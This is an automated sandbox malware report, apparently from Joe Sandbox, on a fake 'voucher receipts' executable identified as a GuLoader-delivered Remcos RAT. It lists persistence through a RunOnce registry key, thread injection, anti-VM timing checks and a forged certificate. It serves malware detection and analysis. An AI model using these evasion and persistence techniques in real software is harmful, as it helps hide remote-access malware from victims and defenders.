            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040310B
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,15_2_0040310B
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_0040481D2_2_0040481D
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00406A952_2_00406A95
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_004062BE2_2_004062BE
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_0040481D15_2_0040481D
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_00406A9515_2_00406A95
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_004062BE15_2_004062BE
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic PE information: invalid certificate
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/16@4/4
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_004042E1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004042E1
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00402036 CoCreateInstance,MultiByteToWideChar,2_2_00402036
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Program Files (x86)\Common Files\airsicknessesJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\Persistent131Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeMutant created: \Sessions\1\BaseNamedObjects\Rintrulux38-8H41NM
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\nslEE6D.tmpJump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeVirustotal: Detection: 23%
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile read: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe "C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic file information: File size 1375376 > 1048576

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.2648233506.0000000006091000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405EBE GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00405EBE
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_10002CE0 push eax; ret 2_2_10002D0E

            Persistence and Installation Behavior

            barindex
            AI detected suspicious PE digital signature
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly), 2) Organization 'Familiaritet' is not a known legitimate company, 3) Email domain 'lokalplanstridig.Kal' is highly suspicious and not a valid TLD, 4) Certificate validation failed with untrusted root certificate, 5) Large time gap between compilation date (2013) and certificate dates (2024-2025) suggests possible certificate manipulation or code resigning, 6) Organization unit 'Marvelousness Yearbook' appears randomly generated or nonsensical, 7) While US-based certificate claims are generally lower risk, the combination with other factors suggests location spoofing. The overall pattern strongly indicates a malicious attempt to appear legitimate while using fake/invalid certificate details.
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exe
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exe
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exe
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exe
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exeJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exeJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exeJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: \bina tegas sdn bhd voucher receipts.exe.bin.exeJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeJump to dropped file
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeFile created: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dllJump to dropped file
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SkruplersJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SkruplersJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SkruplersJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce SkruplersJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeAPI/Special instruction interceptor: Address: 662D680
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeAPI/Special instruction interceptor: Address: 4B5D680
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeRDTSC instruction interceptor: First address: 65EA5C3 second address: 65EA5C3 instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F80B48A3577h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeRDTSC instruction interceptor: First address: 4B1A5C3 second address: 4B1A5C3 instructions: 0x00000000 rdtsc 0x00000002 test cx, bx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F80B4732907h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeWindow / User API: threadDelayed 3174Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeWindow / User API: threadDelayed 1265Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeWindow / User API: threadDelayed 4676Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dllJump to dropped file
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 3956Thread sleep count: 3174 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156Thread sleep count: 1265 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156Thread sleep time: -3795000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156Thread sleep count: 4676 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe TID: 2156Thread sleep time: -14028000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeThread sleep count: Count: 3174 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405470
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405E97 FindFirstFileA,FindClose,2_2_00405E97
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_0040264F FindFirstFileA,2_2_0040264F
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,15_2_00405470
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_00405E97 FindFirstFileA,FindClose,15_2_00405E97
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeCode function: 15_2_0040264F FindFirstFileA,15_2_0040264F
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000002.2647476612.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hECVMWar&Prod_VMware_SATA_CX
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW ^
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-3941
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_2-4100
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeAPI call chain: ExitProcess graph end nodegraph_15-2831
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeAPI call chain: ExitProcess graph end nodegraph_15-2990
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,2_2_0040310B
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00405EBE GetModuleHandleA,LoadLibraryA,GetProcAddress,2_2_00405EBE

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeThread created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe EIP: 4B1A47EJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeMemory written: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe base: 3000000Jump to behavior
